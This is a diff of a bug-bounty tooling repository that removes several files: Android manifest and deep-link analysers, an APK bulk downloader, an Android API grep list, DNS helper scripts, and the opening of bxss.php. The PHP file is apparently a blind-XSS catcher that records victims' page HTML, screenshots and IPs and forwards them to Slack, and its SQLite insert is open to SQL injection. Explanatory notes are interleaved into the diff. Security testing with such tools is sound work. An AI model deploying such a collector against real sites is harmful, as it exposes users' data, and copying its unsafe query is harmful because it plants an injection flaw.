    485  - _print( '%s (%s)' % (file['filename'],file['filesize']), extra, plevel )
    486  - 
    487  - 
    488  -def listFiles():
    489  - printH1( 'FILES' )
    490  - t_all, t_files = _listFiles( src_directory+'/assets/' )
    491  - printH2( 'ASSETS (%d/%d)' % (len(t_files),len(t_all)) )
    492  - printFiles( t_files )
    493  - t_all, t_files = _listFiles( src_directory+'/res/raw/' )
    494  - printH2( 'RES/RAW (%d/%d)' % (len(t_files),len(t_all)) )
    495  - printFiles( t_files )
    496  -############################### INTERESTING FILES ###############################
    497  - 
    498  - 
    499  -############################### DEEP LINKS ###############################
    500  -def listDeepLinks():
    501  - app = root.find( 'application' )
    502  - t_items = app.findall('activity')
    503  - t_items = t_items + app.findall('service')
    504  - t_deeplinks = []
    505  - for activity in t_items:
    506  - t_filters = activity.findall('intent-filter')
    507  - if not t_filters:
    508  - pass
    509  - for filter in t_filters:
    510  - t_tmpdl = []
    511  - has_action = False
    512  - has_category = False
    513  - for child in filter:
    514  - if child.tag == 'action' and child.attrib['name'] == 'android.intent.action.VIEW':
    515  - has_action = True
    516  - if child.tag == 'category' and child.attrib['name'] == 'android.intent.category.BROWSABLE':
    517  - has_category = True
    518  - if child.tag == 'data': # and 'scheme' in child.attrib:
    519  - t_tmpdl.append( child )
    520  - # if has_action and has_category:
    521  - t_deeplinks.extend( t_tmpdl )
    522  - 
    523  - printH1( 'DEEP LINKS (%d)' % (len(t_deeplinks)) )
    524  - 
    525  - for deeplink in t_deeplinks:
    526  - sys.stdout.write( '<data ' )
    527  - for k,v in deeplink.items():
    528  - # sys.stdout.write( 'android:%s="%s" ' % (k,v) )
    529  - sys.stdout.write( '%s="%s" ' % (k,v) )
    530  - sys.stdout.write( '/>\n' )
    531  -############################### DEEP LINKS ###############################
    532  - 
    533  - 
    534  -parser = argparse.ArgumentParser()
    535  -parser.add_argument( "-d","--directory",help="source directory" )
    536  -parser.add_argument( "-t","--term",help="term referencing the editor" )
    537  -parser.add_argument( "-c","--command",help="display commands to run", action="store_true" )
    538  -parser.add_argument( "-m","--mod",help="mod to run" )
    540  -args = parser.parse_args()
    541  - 
    542  -if args.term:
    543  - grep_term = args.term
    544  -else:
    545  - grep_term = ''
    546  - 
    547  -if args.mod:
    548  - mod = args.mod
    549  -else:
    550  - mod = 'paroslf'
    551  - 
    552  -if args.command:
    553  - display_commands = True
    554  -else:
    555  - display_commands = False
    556  - 
    557  -if not args.directory:
    558  - parser.error( 'source directory is missing' )
    559  - 
    560  -args.directory = args.directory.rstrip('/')
    561  -src_directory = args.directory
    562  -if not os.path.isdir(src_directory):
    563  - parser.error( 'source directory not found' )
    564  - 
    565  -src_manifest = src_directory + '/' + 'AndroidManifest.xml'
    566  -if not os.path.isfile(src_manifest):
    567  - parser.error( 'Manifest file not found' )
    568  - 
    569  -try:
    570  - etparse = ET.parse( src_manifest )
    571  -except ET.ParseError:
    572  - parser.error( 'Cannot read Manifest' )
    573  - 
    574  -root = etparse.getroot()
    575  -if root is None:
    576  - parser.error( 'Cannot read Manifest' )
    577  - 
    578  -for elem in root.iter():
    579  - # print( elem.attrib )
    580  - elem.attrib = { k.replace('{http://schemas.android.com/apk/res/android}', ''): v for k, v in elem.attrib.items() }
    581  - # print( elem.attrib )
    582  - 
    583  -grep_term = readInfos( grep_term )
    584  - 
    585  -for m in mod:
    586  - if m == 'p':
    587  - listPermissions()
    588  - elif m == 'f':
    589  - listFiles()
    590  - # listAssets()
    591  - # listRaw()
    592  - elif m == 'a':
    593  - listActivities()
    594  - elif m == 'r':
    595  - listReceivers()
    596  - elif m == 'o':
    597  - listProviders()
    598  - elif m == 's':
    599  - listServices()
    600  - elif m == 'l':
    601  - listDeepLinks()
    602  - 
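The namespace-stripping loop near the top of the script is the key trick that lets every later lookup use bare attribute names. A self-contained sketch of the same technique (the tiny manifest string here is illustrative, not from the repo):

```python
import xml.etree.ElementTree as ET

ANDROID_NS = '{http://schemas.android.com/apk/res/android}'

def strip_android_ns(root):
    # ElementTree stores namespaced attributes as '{uri}name';
    # rewriting the keys yields the bare names the script's lookups expect.
    for elem in root.iter():
        elem.attrib = {k.replace(ANDROID_NS, ''): v for k, v in elem.attrib.items()}
    return root

manifest = ET.fromstring(
    '<manifest xmlns:android="http://schemas.android.com/apk/res/android">'
    '<application><activity android:name=".MainActivity"/></application>'
    '</manifest>'
)
strip_android_ns(manifest)
print(manifest.find('application/activity').get('name'))  # .MainActivity
```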
  • ■ ■ ■ ■ ■ ■
    apk-downloader.py
    1  -import math
    2  -from multiprocessing import Process, Queue
    3  -import os
    4  -import os.path
    5  -import re
    6  -import sys
    7  -import time
    8  - 
    9  -try:
    10  - # Python 3
    11  - from queue import Empty as EmptyQueueException
    12  - from queue import Full as FullQueueException
    13  -except ImportError:
    14  - # Python 2
    15  - from Queue import Empty as EmptyQueueException
    16  - from Queue import Full as FullQueueException
    17  - 
    18  -from bs4 import BeautifulSoup
    19  -import requests
    20  - 
    21  - 
    22  -DOMAIN = "https://apkpure.com"
    23  -SEARCH_URL = DOMAIN + "/search?q=%s"
    24  - 
    25  -DOWNLOAD_DIR = "./downloaded/"
    26  -PACKAGE_NAMES_FILE = "package_names.txt"
    27  -OUTPUT_CSV = "output.csv"
    28  - 
    29  - 
    30  -CONCURRENT_DOWNLOADS = 5
    31  -CHUNK_SIZE = 128*1024 # 128 KiB
    32  -PROGRESS_UPDATE_DELAY = 0.25
    33  -PROCESS_TIMEOUT = 10.0
    34  - 
    35  - 
    36  -MSG_ERROR = -1
    37  -MSG_PAYLOAD = 0
    38  -MSG_START = 1
    39  -MSG_PROGRESS = 2
    40  -MSG_END = 3
    41  - 
    42  - 
    43  -class SplitProgBar(object):
    44  - @staticmethod
    45  - def center(text, base):
    46  - if len(text) <= len(base):
    47  - left = (len(base) - len(text)) // 2
    48  - return "%s%s%s" % (base[:left], text, base[left+len(text):])
    49  - else:
    50  - return base
    51  - 
    52  - def __init__(self, n, width):
    53  - self.n = n
    54  - self.sub_width = int(float(width-(n+1))/n)
    55  - self.width = n * (self.sub_width + 1) + 1
    56  - self.progress = [float("NaN")] * n
    57  - 
    58  - def __getitem__(self, ix):
    59  - return self.progress[ix]
    60  - 
    61  - def __setitem__(self, ix, value):
    62  - self.progress[ix] = value
    63  - 
    64  - def render(self):
    65  - bars = []
    66  - for prog in self.progress:
    67  - if math.isnan(prog) or prog < 0.0:
    68  - bars.append(" " * self.sub_width)
    69  - continue
    70  - bar = "=" * int(round(prog*self.sub_width))
    71  - bar += " " * (self.sub_width-len(bar))
    72  - bar = SplitProgBar.center(" %.2f%% " % (prog*100), bar)
    73  - bars.append(bar)
    74  - 
    75  - new_str = "|%s|" % "|".join(bars)
    76  - sys.stdout.write("\r%s" % new_str)
    77  - 
    78  - def clear(self):
    79  - sys.stdout.write("\r%s\r" % (" " * self.width))
    80  - 
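`SplitProgBar` centers a percentage label inside each fixed-width sub-bar. A reduced single-bar sketch of the same centering logic (names and widths here are illustrative):

```python
def center(text, base):
    # overlay text in the middle of base, as SplitProgBar.center does
    if len(text) <= len(base):
        left = (len(base) - len(text)) // 2
        return base[:left] + text + base[left + len(text):]
    return base

def bar(progress, width=20):
    # '=' fill proportional to progress, label overlaid in the middle
    filled = "=" * int(round(progress * width))
    filled += " " * (width - len(filled))
    return "|" + center(" %.2f%% " % (progress * 100), filled) + "|"

print(bar(0.5))
```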
    81  - 
    82  -class Counter(object):
    83  - def __init__(self, value = 0):
    84  - self.value = value
    85  - 
    86  - def inc(self, n = 1):
    87  - self.value += n
    88  - 
    89  - def dec(self, n = 1):
    90  - self.value -= n
    91  - 
    92  - @property
    93  - def empty(self):
    94  - return self.value == 0
    95  - 
    96  - 
    97  -def download_process(id_, qi, qo):
    98  - def send_progress(progress):
    99  - try:
    100  - qo.put_nowait((MSG_PROGRESS, (id_, progress)))
    101  - except FullQueueException:
    102  - pass
    103  - 
    104  - def send_error(msg):
    105  - qo.put((MSG_ERROR, (id_, msg)))
    106  - 
    107  - def send_start(pkg_name):
    108  - qo.put((MSG_START, (id_, pkg_name)))
    109  - 
    110  - def send_finished(pkg_name, app_name, size, path, already=False):
    111  - if already:
    112  - qo.put((MSG_END, (id_, pkg_name, app_name, size, path)))
    113  - else:
    114  - qo.put((MSG_PAYLOAD, (id_, pkg_name, app_name, size, path)))
    115  - 
    116  - while True:
    117  - message = qi.get()
    118  - 
    119  - if message[0] == MSG_PAYLOAD:
    120  - package_name, app_name, download_url = message[1]
    121  - elif message[0] == MSG_END:
    122  - break
    123  - 
    124  - try:
    125  - r = requests.get(download_url, stream=True)
    126  - except requests.exceptions.ConnectionError:
    127  - send_error("Connection error")
    128  - continue
    129  - 
    130  - if r.status_code != 200:
    131  - send_error("HTTP Error %d" % r.status_code)
    132  - r.close()
    133  - continue
    134  - 
    135  - content_disposition = r.headers.get("content-disposition", "")
    136  - content_length = int(r.headers.get('content-length', 0))
    137  - 
    138  - filename = re.search(r'filename="(.+)"', content_disposition)
    139  - if filename and filename.groups():
    140  - filename = filename.groups()[0]
    141  - else:
    142  - filename = "%s.apk" % (package_name.replace(".", "_"))
    143  - 
    144  - local_path = os.path.normpath(os.path.join(DOWNLOAD_DIR, filename))
    145  - 
    146  - if os.path.exists(local_path):
    147  - if not os.path.isfile(local_path):
    148  - # Not a file
    149  - send_error("%s is a directory" % local_path)
    150  - r.close()
    151  - continue
    152  - if os.path.getsize(local_path) == content_length:
    153  - # File has likely already been downloaded
    154  - send_finished(
    155  - package_name, app_name, content_length, local_path, True)
    156  - r.close()
    157  - continue
    158  - 
    159  - send_start(package_name)
    160  - 
    161  - size = 0
    162  - t = time.time()
    163  - with open(local_path, "wb+") as f:
    164  - for chunk in r.iter_content(chunk_size=CHUNK_SIZE):
    165  - if chunk:
    166  - size += len(chunk)
    167  - f.write(chunk)
    168  - 
    169  - nt = time.time()
    170  - if nt - t >= PROGRESS_UPDATE_DELAY:
    171  - send_progress(float(size) / content_length)
    172  - t = nt
    173  - 
    174  - send_finished(package_name, app_name, size, local_path)
    175  - 
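The filename selection above (Content-Disposition header first, package name as fallback) can be isolated into a small helper; the header strings below are made-up examples:

```python
import re

def apk_filename(content_disposition, package_name):
    # prefer the server-supplied name; otherwise derive one from the package
    m = re.search(r'filename="(.+)"', content_disposition)
    if m:
        return m.group(1)
    return "%s.apk" % package_name.replace(".", "_")

print(apk_filename('attachment; filename="app_1.2.3.apk"', 'com.example.app'))  # app_1.2.3.apk
print(apk_filename('', 'com.example.app'))  # com_example_app.apk
```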
    176  - 
    177  -def search_process(qi, qo):
    178  - def send_error(msg):
    179  - qo.put((MSG_ERROR, msg))
    180  - 
    181  - def send_payload(pkg_name, app_name, dl_url):
    182  - qo.put((MSG_PAYLOAD, (pkg_name, app_name, dl_url)))
    183  - 
    184  - while True:
    185  - message = qi.get()
    186  - 
    187  - if message[0] == MSG_PAYLOAD:
    188  - package_name = message[1]
    189  - elif message[0] == MSG_END:
    190  - break
    191  - 
    192  - # Search page
    193  - # url = SEARCH_URL % package_name
    194  - # try:
    195  - # r = requests.get(url)
    196  - # except requests.exceptions.ConnectionError:
    197  - # send_error("Connection error")
    198  - # continue
    199  - 
    200  - # if r.status_code != 200:
    201  - # send_error("Could not get search page for %s" % package_name)
    202  - # continue
    203  - 
    204  - # soup = BeautifulSoup(r.text, "html.parser")
    205  - 
    206  - # first_result = soup.find("dl", class_="search-dl")
    207  - # if first_result is None:
    208  - # send_error("Could not find %s" % package_name)
    209  - # continue
    210  - 
    211  - # search_title = first_result.find("p", class_="search-title")
    212  - # search_title_a = search_title.find("a")
    213  - 
    214  - # app_name = search_title.text.strip()
    215  - # app_url = search_title_a.attrs["href"]
    216  - 
    217  - app_url = '/aaaaaaaaaaaaa/' + package_name
    218  - 
    219  - # App page
    220  - url = DOMAIN + app_url
    221  - try:
    222  - r = requests.get(url)
    223  - except requests.exceptions.ConnectionError:
    224  - send_error("Connection error")
    225  - continue
    226  - 
    227  - if r.status_code != 200:
    228  - send_error("Could not get app page for %s" % package_name)
    229  - continue
    230  - 
    231  - soup = BeautifulSoup(r.text, "html.parser")
    232  - app_name = package_name
    233  - # app_name = search_title.text.strip()
    234  - 
    235  - download_button = soup.find("a", {"class":"da"})
    236  - if download_button is None:
    237  - send_error("%s is a paid app. Could not download" % package_name)
    238  - continue
    239  - 
    240  - download_url = download_button.attrs["href"]
    241  - 
    242  - # Download app page
    243  - url = DOMAIN + download_url
    244  - try:
    245  - r = requests.get(url)
    246  - except requests.exceptions.ConnectionError:
    247  - send_error("Connection error")
    248  - continue
    249  - 
    250  - if r.status_code != 200:
    251  - send_error("Could not get app download page for %s" % package_name)
    252  - continue
    253  - 
    254  - soup = BeautifulSoup(r.text, "html.parser")
    255  - 
    256  - download_link = soup.find("a", {"id":"download_link"})
    257  -
    258  - if download_link is None:
    259  - send_error("%s is a paid or region app. Could not download" % package_name)
    260  - continue
    261  - 
    262  - download_apk_url = download_link.attrs["href"]
    263  - 
    264  - send_payload(package_name, app_name, download_apk_url)
    265  - 
    266  - 
    267  -def main():
    268  - # Create the download directory
    269  - if not os.path.exists(DOWNLOAD_DIR):
    270  - os.makedirs(DOWNLOAD_DIR)
    271  - elif not os.path.isdir(DOWNLOAD_DIR):
    272  - print("%s is not a directory" % DOWNLOAD_DIR)
    273  - return -1
    274  - 
    275  - 
    276  - # Read the package names
    277  - if not os.path.isfile(PACKAGE_NAMES_FILE):
    278  - print("Could not find %s" % PACKAGE_NAMES_FILE)
    279  - return -1
    280  - 
    281  - with open(PACKAGE_NAMES_FILE, "r") as f:
    282  - package_names = [line.strip() for line in f.readlines()]
    283  - 
    284  - 
    285  - # CSV file header
    286  - with open(OUTPUT_CSV, "w+") as csv:
    287  - csv.write("App name,Package name,Size,Location\n")
    288  - 
    289  - 
    290  - # Message-passing queues
    291  - search_qi = Queue()
    292  - search_qo = Queue()
    293  - 
    294  - download_qi = Queue()
    295  - download_qo = Queue()
    296  - 
    297  - 
    298  - # Search Process
    299  - search_proc = Process(target=search_process, args=(search_qo, search_qi))
    300  - search_proc.start()
    301  - 
    302  - 
    303  - # Download Processes
    304  - download_procs = []
    305  - for i in range(CONCURRENT_DOWNLOADS):
    306  - download_proc = Process(target=download_process,
    307  - args=(i, download_qo, download_qi))
    308  - download_procs.append(download_proc)
    309  - download_proc.start()
    310  - 
    311  - 
    312  - active_tasks = Counter()
    313  - def new_search_query():
    314  - if package_names:
    315  - search_qo.put((MSG_PAYLOAD, package_names.pop(0)))
    316  - active_tasks.inc()
    317  - return True
    318  - return False
    319  - 
    320  - # Send some queries to the search process
    321  - for _ in range(CONCURRENT_DOWNLOADS + 1):
    322  - new_search_query()
    323  - 
    324  - 
    325  - prog_bars = SplitProgBar(CONCURRENT_DOWNLOADS, 80)
    326  - 
    327  - def log(msg, pb=True):
    328  - prog_bars.clear()
    329  - print(msg)
    330  - if pb:
    331  - prog_bars.render()
    332  - sys.stdout.flush()
    333  - 
    334  - last_message_time = time.time()
    335  - while True:
    336  - if active_tasks.empty:
    337  - log("Done!", False)
    338  - break
    339  - 
    340  - no_message = True
    341  - 
    342  - try:
    343  - # Messages from the search process
    344  - message = search_qi.get(block=False)
    345  - last_message_time = time.time()
    346  - no_message = False
    347  - 
    348  - if message[0] == MSG_PAYLOAD:
    349  - # Download URL found => Start a download
    350  - download_qo.put(message)
    351  - log(" Found app for %s" % message[1][0])
    352  - 
    353  - elif message[0] == MSG_ERROR:
    354  - # Error with search query
    355  - log("!!" + message[1])
    356  - active_tasks.dec()
    357  - 
    358  - # Search for another app
    359  - new_search_query()
    360  - except EmptyQueueException:
    361  - pass
    362  - 
    363  - try:
    364  - # Messages from the download processes
    365  - message = download_qi.get(block=False)
    366  - last_message_time = time.time()
    367  - no_message = False
    368  - 
    369  - if message[0] == MSG_PAYLOAD or message[0] == MSG_END:
    370  - # Download finished
    371  - id_, package_name, app_name, size, location = message[1]
    372  - prog_bars[id_] = float("NaN")
    373  - 
    374  - if message[0] == MSG_PAYLOAD:
    375  - log(" Finished downloading %s" % package_name)
    376  - elif message[0] == MSG_END:
    377  - log(" File already downloaded for %s" % package_name)
    378  - 
    379  - # Add row to CSV file
    380  - # with open(OUTPUT_CSV, "a") as csv:
    381  - # csv.write(",".join([
    382  - # '"%s"' % app_name.replace('"', '""'),
    383  - # '"%s"' % package_name.replace('"', '""'),
    384  - # "%d" % size,
    385  - # '"%s"' % location.replace('"', '""')]))
    386  - # csv.write("\n")
    387  - 
    388  - active_tasks.dec()
    389  - 
    390  - # Search for another app
    391  - new_search_query()
    392  - 
    393  - elif message[0] == MSG_START:
    394  - # Download started
    395  - id_, package_name = message[1]
    396  - prog_bars[id_] = 0.0
    397  - log(" Started downloading %s" % package_name)
    398  - 
    399  - elif message[0] == MSG_PROGRESS:
    400  - # Download progress
    401  - id_, progress = message[1]
    402  - prog_bars[id_] = progress
    403  - prog_bars.render()
    404  - 
    405  - elif message[0] == MSG_ERROR:
    406  - # Error during download
    407  - id_, msg = message[1]
    408  - log("!!" + msg)
    409  - prog_bars[id_] = 0.0
    410  - 
    411  - active_tasks.dec()
    412  - 
    413  - # Search for another app
    414  - new_search_query()
    415  - except EmptyQueueException:
    416  - pass
    417  - 
    418  - if no_message:
    419  - if time.time() - last_message_time > PROCESS_TIMEOUT:
    420  - log("!!Timed out after %.2f seconds" % (PROCESS_TIMEOUT), False)
    421  - break
    422  - time.sleep(PROGRESS_UPDATE_DELAY / 2.0)
    423  - 
    424  - # End processes
    425  - search_qo.put((MSG_END, ))
    426  - for _ in range(CONCURRENT_DOWNLOADS):
    427  - download_qo.put((MSG_END, ))
    428  - 
    429  - search_proc.join()
    430  - for download_proc in download_procs:
    431  - download_proc.join()
    432  - 
    433  - return 0
    434  - 
    435  - 
    436  -if __name__ == '__main__':
    437  - sys.exit(main())
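The whole downloader is driven by `(MSG_*, payload)` tuples on queues, with `(MSG_END,)` as a shutdown sentinel. A minimal sketch of that protocol, using threads instead of processes for brevity (the uppercase transform stands in for real work):

```python
import queue
import threading

MSG_PAYLOAD, MSG_END = 0, 3

def worker(qi, qo):
    # consume payload tuples until the MSG_END sentinel, like download_process
    while True:
        msg = qi.get()
        if msg[0] == MSG_END:
            break
        qo.put((MSG_PAYLOAD, msg[1].upper()))

qi, qo = queue.Queue(), queue.Queue()
t = threading.Thread(target=worker, args=(qi, qo))
t.start()
qi.put((MSG_PAYLOAD, 'com.example.app'))
qi.put((MSG_END,))
result = qo.get()
t.join()
print(result)  # (0, 'COM.EXAMPLE.APP')
```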
  • ■ ■ ■ ■ ■ ■
    apk-regexp.sh
    1  -#!/bin/bash
    2  - 
    3  -target_dir=$1
    4  -script_dir=$(dirname "$(readlink -f "$0")")
    5  - 
    6  -cat "$script_dir/apk-regexp.txt" | while read -r r; do
    7  - title=`echo "$r" | awk -F ";;" '{print $1}'`
    8  - echo "[+] $title"
    9  - reg=`echo "$r" | awk -F ";;" '{print $2}'`
    10  - escape_reg=$reg
    11  - escape_reg=$(echo "$escape_reg" | sed "s/\"/\\\\\"/g")
    12  - echo "-> $escape_reg"
    13  - grep -E --color -ri "$escape_reg" "$target_dir"
    14  - echo
    15  - echo
    16  -done
    17  - 
  • ■ ■ ■ ■ ■ ■
    apk-regexp.txt
    1  -Buckets/Takeovers;;amazonaws|azurewebsites|cloudapp|trafficmanager|herokuapp|cloudfront|digitaloceanspace|storage\.(cloud|google)|firebaseio\.com
    2  -Webview;;setAllowContent|setAllowFileAccess|setAllowFileAccessFromFileURLs|setAllowUniversalAccessFromFileURLS|setJavascriptEnabled|setPluginState|setSavePassword|JavascriptInterface|loadUrl|setPluginsEnabled|setPluginState|shouldOverrideUrlLoading
    3  -External call;;[^a-z](OPTIONS|GET|HEAD|POST|PUT|DELETE|TRACE|CONNECT|PROPFIND|PROPPATCH|MKCOL|COPY|MOVE|LOCK|UNLOCK|VERSION-CONTROL|REPORT|CHECKOUT|CHECKIN|UNCHECKOUT|MKWORKSPACE|UPDATE|LABEL|MERGE|BASELINE-CONTROL|MKACTIVITY|ORDERPATCH|ACL|PATCH|SEARCH|ARBITRARY)[^a-z]
    4  -External call;;@(OPTIONS|GET|HEAD|POST|PUT|DELETE|TRACE|CONNECT|PROPFIND|PROPPATCH|MKCOL|COPY|MOVE|LOCK|UNLOCK|VERSION-CONTROL|REPORT|CHECKOUT|CHECKIN|UNCHECKOUT|MKWORKSPACE|UPDATE|LABEL|MERGE|BASELINE-CONTROL|MKACTIVITY|ORDERPATCH|ACL|PATCH|SEARCH|ARBITRARY)\(
    5  -Parameters;;putExtra|getBundleExtra|getBooleanExtra|getDoubleExtra|getIntExtra|getShortExtra|getStringExtra|getLongExtra|getFloatExtra|getCharExtra|getByteExtra|removeExtra|getCharSequenceExtra|getParcelableExtra|getBooleanArrayExtra|getCharArrayExtra|getByteArrayExtra|getCharSequenceArrayExtra|getCharSequenceArrayListExtra|getDoubleArrayExtra|getFloatArrayExtra|getIntArrayExtra|getIntegerArrayListExtra|getParcelableArrayListExtra|getParcelableArrayExtra|getSerializableExtra|getShortArrayExtra|getStringArrayExtra|getStringArrayListExtra|putIntegerArrayListExtra|putParcelableArrayListExtra|putStringArrayListExtra
    6  -URL Parameters;;[&\?][a-zA-Z0-9\_]+=
    7  -Log call;;Log\.|Timber\.
    8  -Base64 encoded/decoded strings;;base64
    9  -IP address;;([0-9]{1,3}\s*,\s*){3,}
    10  -Internal Storage;;MODE_|getPreferences|getDefaultSharedPreferences|createTempFile|SQLiteDatabase|openOrCreateDatabase|execSQL|rawQuery
    11  -External Storage;;EXTERNAL_STORAGE|EXTERNAL_CONTENT|getExternal
    12  -Content Provider;;content://
    13  -System;;SystemProperties|\.exec\(
    14  -Intent;;new Intent|new android\.content\.Intent|android\.intent\.action|PendingIntent|sendBroadcast|sendOrderedBroadcast|startActivity|resolveActivity|createChooser|startService|bindService|registerReceiver
    15  -Fragment;;Fragment\.instantiate|FragmentManager|isValidFragment|FragmentTransaction
    16  -SSL Certificate;;CertificatePinner|HostnameVerifier|X509Certificate|CertificatePinner|networkSecurityConfig|network-security-config|onReceivedSslError
    17  -Package install;;vnd\.android\.package-archive
    18  -File manipulation;;(get|set|open|add|new)[a-zA-Z0]*(File|URI|Stream|Image|Document|Dir|Content|Url)[a-zA-Z0]*
    19  - 
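Each line in this file is a `title;;regexp` pair consumed by apk-regexp.sh. A sketch of parsing and applying the format in Python (the two sample rules and the `source` line below are illustrative, taken from the list's own entries):

```python
import re

RULES = "Content Provider;;content://\nLog call;;Log\\.|Timber\\."

def load_rules(text):
    # split each "title;;regexp" line into (title, compiled pattern)
    rules = []
    for line in text.splitlines():
        if ';;' in line:
            title, pattern = line.split(';;', 1)
            rules.append((title, re.compile(pattern, re.I)))
    return rules

source = 'Uri u = Uri.parse("content://com.example.provider/items");'
for title, rx in load_rules(RULES):
    if rx.search(source):
        print('[+]', title)  # [+] Content Provider
```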
  • ■ ■ ■ ■ ■ ■
    arpa.sh
    skipped 35 lines
    36 36  for a in $arpa ; do
    37 37   str=$(echo "$a" | awk -F "YYY" '{print $1}')
    38 38   ip=$(echo "$str" | awk -F "." '{print $4"."$3"."$2"."$1}')
    39  - #echo $ip
    40  - dom=$(echo "$a" | awk -F "YYY" '{print $2}')
    41  - dom=${dom:0:-1}
     39 + # dom=$(echo "$a" | awk -F "YYY" '{print $2}')
     40 + # dom=${dom:0:-1}
    42 41   #echo $dom
    43  - echo $ip" "$dom
     42 + echo $ip
     43 + # echo $ip" "$dom
    44 44  done
    45 45   
    46 46  exit
    skipped 1 lines
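The awk pipeline above reverses the four leading octets of an in-addr.arpa name to recover the IP. The same transform as a small Python sketch (sample input is hypothetical):

```python
def arpa_to_ip(name):
    # "4.3.2.1.in-addr.arpa." -> "1.2.3.4", as the awk pipeline does
    octets = name.rstrip('.').split('.')[:4]
    return '.'.join(reversed(octets))

print(arpa_to_ip('4.3.2.1.in-addr.arpa.'))  # 1.2.3.4
```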
  • ■ ■ ■ ■ ■ ■
    bbhost.sh
    1 1  #!/bin/bash
    2 2   
     3 +# multithreaded host command
     4 + 
    3 5  if [ $# -lt 1 ] ; then
    4 6   input="hosts"
    5 7  else
    skipped 11 lines
    17 19  parallel -j 20 "host " :::: $input | tee -a $output
    18 20  exit;
    19 21   
    20  -for h in $(cat $input) ; do
    21  - host $h | tee -a $output
    22  - echo "" | tee -a $output
    23  -done
     22 +# for h in $(cat $input) ; do
     23 +# host $h | tee -a $output
     24 +# echo "" | tee -a $output
     25 +# done
    24 26   
  • ■ ■ ■ ■ ■ ■
    bxss.php
    1  -<?php
    2  - 
    3  -ini_set('display_errors', 0 );
    4  -ini_set('display_startup_errors', 0 );
    5  -error_reporting( 0 );
    6  - 
    7  - 
    8  -$_config = [
    9  - 'image_path' => 'images/', // relative please!
    10  - 'report' => [
    11  - 'file' => [
    12  - 'enabled' => false,
    13  - 'path' => 'xss.log',
    14  - ],
    15  - 'mail' => [ // not implemented yet
    16  - 'enabled' => false,
    17  - 'to' => '',
    18  - ],
    19  - 'sqlite' => [
    20  - 'enabled' => false,
    21  - 'path' => 'xss.db',
    22  - 
    23  - ],
    24  - 'slack' => [
    25  - 'enabled' => false,
    26  - 'webhook_url' => '',
    27  - ],
    28  - ],
    29  -];
    30  - 
    31  - 
    32  -class Reporting
    33  -{
    34  - public static function getClientIp()
    35  - {
    36  - if( isset($_SERVER['HTTP_X_FORWARDED_FOR']) ) {
    37  - return filter_var( $_SERVER['HTTP_X_FORWARDED_FOR'], FILTER_VALIDATE_IP );
    38  - }
    39  - 
    40  - if( isset($_SERVER['HTTP_CLIENT_IP']) ) {
    41  - return filter_var( $_SERVER['HTTP_CLIENT_IP'], FILTER_VALIDATE_IP );
    42  - }
    43  - 
    44  - return filter_var( $_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP );
    45  - }
    46  - 
    47  - public static function report_file( $config, $t_datas ) {
    48  - $log = str_repeat('-',10).' '.$t_datas['date'].' '.str_repeat('-',50)."\n\n";
    49  - unset( $t_datas['id'] );
    50  - unset( $t_datas['date'] );
    51  - foreach( $t_datas as $k=>$v ) {
    52  - $log .= strtoupper( $k ).":\n";
    53  - $log .= $v."\n\n";
    54  - }
    55  - file_put_contents( $config['path'], $log, FILE_APPEND | LOCK_EX );
    56  - }
    57  - public static function report_mail( $config, $t_datas ) {
    58  - // todo
    59  - }
    60  - public static function report_sqlite( $config, $t_datas ) {
    61  - $db = new SQLite3( $config['path'] );
    62  - $q = 'SELECT COUNT(*) FROM bxss';
    63  - $result = @$db->query( $q );
    64  - 
    65  - if( $result === false ) {
    66  - $db->exec( 'CREATE TABLE bxss (id STRING PRIMARY KEY, created_at DATETIME, datas TEXT)' );
    67  - $db->query( $q );
    68  - }
    69  - 
    70  - $db->query( "INSERT INTO bxss (id, created_at, datas) VALUES('".$t_datas['id']."', '".$t_datas['date']."', '".base64_encode(json_encode($t_datas))."')" );
    71  - }
    72  - public static function report_slack( $config, $t_datas ) {
    73  - $log = '*'.str_repeat('-',10).' '.$t_datas['date'].' '.str_repeat('-',50)."*\n\n";
    74  - if( isset($t_datas['screenshot']) ) {
    75  - $screenshot = $t_datas['screenshot'];
    76  - unset($t_datas['screenshot']);
    77  - }
    78  - if( isset($t_datas['document_html']) ) {
    79  - $document_html = $t_datas['document_html'];
    80  - unset( $t_datas['document_html'] );
    81  - $document_save = $t_datas['document_save'];
    82  - unset( $t_datas['document_save'] );
    83  - }
    84  - unset( $t_datas['id'] );
    85  - unset( $t_datas['date'] );
    86  - foreach( $t_datas as $k=>$v ) {
    87  - $log .= strtoupper( $k )."\n";
    88  - $log .= '```'.$v."```\n\n";
    89  - }
    90  - $t_json = [];
    91  - $t_json['text'] = $log;
    92  - $t_json['attachments'] = [];
    93  - if( isset($screenshot) ) {
    94  - $attachment = [];
    95  - $attachment['pretext'] = 'SCREENSHOT';
    96  - $attachment['title'] = $attachment['title_link'] = $attachment['image_url'] = $screenshot;
    97  - $t_json['attachments'][] = $attachment;
    98  - }
    99  - if( isset($document_html) ) {
    100  - $attachment = [];
    101  - $attachment['title'] = $attachment['title_link'] = $document_save;
    102  - $attachment['pretext'] = 'HTML_DOCUMENT';
    103  - $attachment['text'] = $document_html;
    104  - $t_json['attachments'][] = $attachment;
    105  - }
    106  - $c = curl_init();
    107  - curl_setopt( $c, CURLOPT_URL, $config['webhook_url'] );
    108  - curl_setopt( $c, CURLOPT_POST, true );
    109  - curl_setopt( $c, CURLOPT_HTTPHEADER, ['Content-type: application/json'] );
    110  - curl_setopt( $c, CURLOPT_POSTFIELDS, json_encode($t_json) );
    111  - curl_setopt( $c, CURLOPT_RETURNTRANSFER, true );
    112  - curl_exec( $c );
    113  - }
    114  - public static function save_html( $path, $id, $content ) {
    115  - $path_abs = dirname($_SERVER['SCRIPT_FILENAME']).'/'.trim($path,'/');
    116  - if( !is_dir($path_abs) ) {
    117  - if( !mkdir($path_abs,0777,true) ) {
    118  - return '';
    119  - }
    120  - }
    121  - $file = $id.'.html';
    122  - $path_abs = $path_abs.'/'.$file;
    123  - if( file_put_contents($path_abs,$content) !== false ) {
    124  - $url = $_SERVER['REQUEST_SCHEME'].'://'.$_SERVER['SERVER_NAME'].rtrim(dirname($_SERVER['SCRIPT_NAME']),'/').'/'.trim($path,'/').'/'.$file;
    125  - return $url;
    126  - } else {
    127  - return '';
    128  - }
    129  - }
    130  - public static function save_screenshot( $path, $id, $content ) {
    131  - $path_abs = dirname($_SERVER['SCRIPT_FILENAME']).'/'.trim($path,'/');
    132  - if( !is_dir($path_abs) ) {
    133  - if( !mkdir($path_abs,0777,true) ) {
    134  - return '';
    135  - }
    136  - }
    137  - $file = $id.'.png';
    138  - $path_abs = $path_abs.'/'.$file;
